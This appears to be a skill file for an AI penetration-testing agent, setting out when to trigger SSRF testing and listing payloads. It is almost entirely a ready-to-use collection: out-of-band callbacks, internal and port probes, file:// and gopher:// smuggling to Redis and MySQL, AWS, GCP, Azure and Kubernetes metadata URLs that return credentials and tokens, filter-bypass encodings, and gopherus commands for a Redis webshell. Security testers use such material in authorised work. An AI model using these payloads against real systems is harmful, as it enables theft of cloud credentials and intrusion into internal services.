name: ssrf-testing description: Detect and exploit server-side request forgery to access internal resources and cloud metadata origin: RedteamOpencode
SSRF Testing
When to Activate
- Parameter accepts URL/hostname:
url=,uri=,src=,dest=,redirect=,feed=,link= - PDF/doc generators fetching remote resources, file upload via URL, API integrations, proxy endpoints
Detection
1. Out-of-Band Confirmation
?url=http://COLLABORATOR_DOMAIN/ssrf-test
?url=http://YOUR_SERVER:8888/ssrf-test
# Listener: python3 -m http.server 8888 / nc -lvp 8888
2. Internal Network Probing
http://127.0.0.1/ http://localhost/ http://0.0.0.0/ http://[::1]/
http://127.1/ http://0/ http://0x7f000001/ http://2130706433/
http://10.0.0.1/ http://172.16.0.1/ http://192.168.1.1/ http://169.254.169.254/
3. Protocol Testing
file:///etc/passwd # File read
gopher://127.0.0.1:6379/_INFO # Redis
gopher://127.0.0.1:3306/_ # MySQL
dict://127.0.0.1:6379/INFO # Dict
ftp://127.0.0.1/
4. Port Scanning via SSRF
Test http://127.0.0.1:PORT/ for common ports (22, 80, 3306, 6379, 8080, 9200, 27017). Indicators: response time diffs, different errors, content length changes, status code diffs.
Cloud Metadata
AWS
# IMDSv1
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
http://169.254.169.254/latest/user-data
# IMDSv2 requires PUT for token + X-aws-ec2-metadata-token header
GCP
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Requires Metadata-Flavor: Google header (legacy v1beta1 endpoint doesn't)
Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Requires Metadata: true header
Kubernetes
file:///var/run/secrets/kubernetes.io/serviceaccount/token
https://kubernetes.default.svc/
Filter Bypass
IP Encoding
http://2130706433/ http://0x7f000001/ http://0177.0.0.01/ # Decimal/Hex/Octal for 127.0.0.1
http://[::ffff:127.0.0.1]/ http://127.0.0x0.1/ # IPv6/mixed
DNS Rebinding
# 127.0.0.1.nip.io 127-0-0-1.sslip.io rbndr.us/dword
URL Parsing Tricks
http://attacker.com@127.0.0.1/ # Credential section bypass
http://127.0.0.1#@attacker.com/
http://allowed-domain.com/redirect?url=http://127.0.0.1/ # Redirect chain
http://allowed.com\@127.0.0.1/ # Backslash
http://127.0.0.1.allowed.com/ # Subdomain wildcard
Gopher Protocol Smuggling
# Redis webshell, MySQL, SMTP — use Gopherus tool:
gopherus --exploit redis
gopherus --exploit mysql
Internal Service Targets
http://127.0.0.1:9200/_cat/indices # Elasticsearch
http://127.0.0.1:2375/containers/json # Docker API
http://127.0.0.1:8500/v1/kv/?recurse # Consul
https://127.0.0.1:10250/pods/ # Kubelet